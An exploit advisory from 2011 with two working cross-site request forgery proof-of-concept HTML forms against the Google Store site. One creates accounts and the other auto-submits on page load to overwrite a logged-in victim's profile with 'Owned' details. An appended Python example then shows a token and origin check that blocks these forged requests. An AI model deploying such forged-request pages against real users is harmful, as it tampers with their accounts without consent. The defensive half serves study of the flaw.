
Google Store Cross Site Request Forgery

Posted on 27 August 2011

#
#[+]Exploit Title: Google Store Multiple XSRF Security Vulnerabilities
#[+]Date: 2682011
#[+]Author: C4SS!0 G0M3S
#[+]Vendor Link: https://www.google-store.com
#

#################################### Add User ####################################################
<body style="background-color: black; color: white;">
<form action="https://www.google-store.com/create_account.php" method="POST">
<input type="hidden" name="action" value="process"></input>
<b>First Name:</b><br><input type="text" size="50" name="firstname" value=""></input><br>
<b>Last Name:</b><br><input type="text" size="50" name="lastname" value=""></input><br>
<b>E-mail Address:</b><br><input type="text" size="50" name="email_address" value=""></input><br>
<b>Company:</b><br><input type="text" size="50" name="company" value=""></input><br>
<b>Address:</b><br><input type="text" size="50" name="street_address" value=""></input><br>
<b>Post Code:</b><br><input type="text" size="50" name="postcode" value=""></input><br>
<input type="hidden" name="country" value="30"></input>
<b>City:</b><br><input type="text" size="50" name="city" value=""></input><br>
<b>Telephone:</b><br><input type="text" size="50" name="telephone" value=""></input><br>
<b>Fax:</b><br><input type="text" size="50" name="fax" value=""></input><br>
<input type="hidden" name="newsletter" value="1"></input>
<input type="hidden" name="x" value="47"></input>
<input type="hidden" name="y" value="15"></input>
<input type="submit" value="Send Request"></input>
</form>
#################################################################################################

################################### Profile User Informations Editor ############################
<title>Google Store Profile Informations Editor CSRF Vulnerability.</title>
<body onload="con = confirm('Are You Ready'); if(con){document.send.submit()}" style="background-color:black; color: white;">
<h1>This exploit demonstrates how to exploit a CSRF flaw on the site of the Google Store.<br><br>
Steps to reproduce:<br><br>
1. Log in no <a href="https://www.google-store.com" target="_blank">Google Store</a>.<br>
2. Open this exploit and click in Ok.<br>
3. Check your profile configurations. :)<br><br>
Are You Ready?
</h1>
<form name="send" action="https://www.google-store.com/account_edit.php" method="POST">
<input type="hidden" name="action" value="process"></input>
<input type="hidden" name="firstname" value="Owned"></input>
<input type="hidden" name="lastname" value="Owned"></input>
<input type="hidden" name="email_address" value="Owned@gmail.com"></input>
<input type="hidden" name="telephone" value="123456789"></input>
<input type="hidden" name="fax" value="9876543210"></input>
<input type="hidden" name="x" value="99"></input>
<input type="hidden" name="y" value="99"></input>
</form>
#####################################################################################################
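
Neither form above carries a per-session secret, so a cross-site page can submit them with the victim's cookies. The following is an added example (not part of the original advisory and not the vendor's code) of a server-side gate that rejects both forged POSTs by requiring a session-bound token and a same-origin request. The field name csrf_token, the session ids, the server secret and the attacker origin are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumptions for illustration, none taken from the advisory:
SERVER_SECRET = secrets.token_bytes(32)       # per-deployment secret key
SHOP_ORIGIN = "https://www.google-store.com"  # origin of the shop's own pages
TOKEN_FIELD = "csrf_token"                    # hypothetical hidden field name


def issue_token(session_id: str) -> str:
    """Value the shop embeds as a hidden field in forms it serves itself."""
    mac = hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256)
    return mac.hexdigest()


def same_origin(headers: dict) -> bool:
    """True only if Origin (or, failing that, Referer) names the shop."""
    source = headers.get("Origin") or headers.get("Referer") or ""
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == SHOP_ORIGIN


def accept_post(session_id: str, headers: dict, form: dict) -> bool:
    """Gate for state-changing handlers such as account_edit.php."""
    if not same_origin(headers):
        return False
    sent = form.get(TOKEN_FIELD, "").encode()
    expected = issue_token(session_id).encode()
    return hmac.compare_digest(sent, expected)  # constant-time comparison


# Constructed sample requests. FORGED carries the fields of the second form above.
FORGED = {"action": "process", "firstname": "Owned", "lastname": "Owned",
          "email_address": "Owned@gmail.com", "telephone": "123456789",
          "fax": "9876543210", "x": "99", "y": "99"}
SESSION = "sess-victim-0001"  # constructed session id
GENUINE = dict(FORGED, firstname="Alice", **{TOKEN_FIELD: issue_token(SESSION)})

if __name__ == "__main__":
    cross_site = {"Origin": "https://attacker.example"}
    own_page = {"Origin": SHOP_ORIGIN}
    print("forged, cross-site :", accept_post(SESSION, cross_site, FORGED))
    print("forged, no token   :", accept_post(SESSION, own_page, FORGED))
    print("genuine            :", accept_post(SESSION, own_page, GENUINE))
```

Requests that send neither Origin nor Referer are rejected here; that strictness is a policy choice of this example, and the token check alone still stops the forged forms.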

 
